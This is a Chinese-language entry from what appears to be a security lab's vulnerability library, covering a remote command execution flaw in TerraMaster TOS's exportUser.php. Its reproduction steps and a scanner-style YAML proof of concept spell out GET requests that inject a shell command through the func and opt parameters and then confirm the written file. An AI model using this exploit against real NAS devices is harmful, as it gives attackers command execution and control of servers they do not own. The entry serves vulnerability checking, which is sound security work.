TerraMaster TOS 远程命令执行漏洞-lanc-漏洞文库小世界-安全文库-NGC660 安全实验室

TerraMaster TOS 远程命令执行漏洞-lanc

0x01 漏洞名称

 TerraMaster TOS 远程命令执行漏洞

0x02 漏洞描述

TerraMaster TOS系统 exportUser.php 存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷

0x03 漏洞复现

(1)访问include/exportUser.php?type=3&cla=application&func=exec&opt=(echo 123)%3E1.txt
![](/uploads/Weapon/images/m
99a450a68e005e47374a4450dc68f35d_r.png)
(2)访问include/1.txt发现写入成功
m_b49fd6c5b2ad95ff35f92803a869fbce_r-1

0x04 漏洞POC

params: []
name: TerraMaster TOS 远程命令执行漏洞
set: {}
rules:
- method: GET
 path: /include/exportUser.php?         type=3&cla=application&func=_exec&opt=(echo 123)>1.txt
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200
- method: GET
  path: /include/1.txt
 headers: {}
 body: ""
search: ""
 followredirects: false
 expression: response.status == 200 &&     response.body.bcontains(b"123")
groups: {}
detail:
 author: ""
 links: []
  description: ""
 version: ""

m_56153fc5956325b2d667de535e70d4bd_r-1

请登录后发表评论

    请登录后查看回复内容